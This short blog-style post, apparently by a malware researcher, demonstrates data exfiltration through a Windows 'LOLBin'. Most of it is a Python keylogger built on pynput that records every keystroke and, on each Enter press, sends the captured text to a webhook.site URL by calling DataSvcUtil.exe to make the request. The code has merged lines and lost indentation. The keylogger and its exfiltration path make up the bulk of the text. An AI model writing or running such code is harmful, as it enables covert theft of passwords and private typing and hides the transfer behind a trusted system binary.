Data Exfiltration with LOLBins

/uri:serviceuri — At this point you need to insert the URL containing the data that will be exfiltrated
Event with webhook.site
# From: https://github.com/moses-palmer/pynput
from pynput.keyboard import Key, Listener
import os
import sys
import subprocessURL = 'https://webhook.site/xxxxxx-xxxxx-xxxx-xxxxx-xxxxxxx'
uploader = "C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\DataSvcUtil.exe"
content = ""def on_press(key):
global content
global URL
global uploader
if str(key) == 'Key.backspace':
content += ' '
else:
content += str(key)print(f'last key: {str(key)}')
print("")if str(key) == 'Key.enter':
upload_url = (f'{URL}?{content}')
subprocess.call([uploader, 'c:\\temp\\test.xml', upload_url])
buffer = ''if key == 0x03:
sys.exit(0)if __name__ == "__main__":
try:
with Listener(on_press=on_press) as listener:
listener.join()
except (KeyboardInterrupt, SystemExit):
sys.exit(0)

reverse engineering and malware tales\\ Linkedin@isdebuggerpresent\\